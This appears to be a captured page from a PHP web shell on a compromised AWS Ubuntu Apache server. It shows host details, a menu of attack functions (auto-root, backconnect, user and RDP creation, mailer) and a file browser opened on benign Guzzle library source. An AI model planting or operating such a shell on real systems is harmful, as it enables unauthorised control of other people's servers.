Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.145.153.251
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
oasis /
aws /
GuzzleHttp /
Handler /
[ HOME SHELL ]
Name
Size
Permission
Action
CurlFactory.php
21.04
KB
-rwxr-xr-x
CurlFactoryInterface.php
702
B
-rwxr-xr-x
CurlHandler.php
1.23
KB
-rwxr-xr-x
CurlMultiHandler.php
6.31
KB
-rwxr-xr-x
EasyHandle.php
2.76
KB
-rwxr-xr-x
MockHandler.php
5.92
KB
-rwxr-xr-x
Proxy.php
1.73
KB
-rwxr-xr-x
StreamHandler.php
18.17
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Proxy.php
<?php namespace GuzzleHttp\Handler; use GuzzleHttp\RequestOptions; use Psr\Http\Message\RequestInterface; /** * Provides basic proxies for handlers. */ class Proxy { /** * Sends synchronous requests to a specific handler while sending all other * requests to another handler. * * @param callable $default Handler used for normal responses * @param callable $sync Handler used for synchronous responses. * * @return callable Returns the composed handler. */ public static function wrapSync( callable $default, callable $sync ) { return function (RequestInterface $request, array $options) use ($default, $sync) { return empty($options[RequestOptions::SYNCHRONOUS]) ? $default($request, $options) : $sync($request, $options); }; } /** * Sends streaming requests to a streaming compatible handler while sending * all other requests to a default handler. * * This, for example, could be useful for taking advantage of the * performance benefits of curl while still supporting true streaming * through the StreamHandler. * * @param callable $default Handler used for non-streaming responses * @param callable $streaming Handler used for streaming responses * * @return callable Returns the composed handler. */ public static function wrapStreaming( callable $default, callable $streaming ) { return function (RequestInterface $request, array $options) use ($default, $streaming) { return empty($options['stream']) ? $default($request, $options) : $streaming($request, $options); }; } }
Close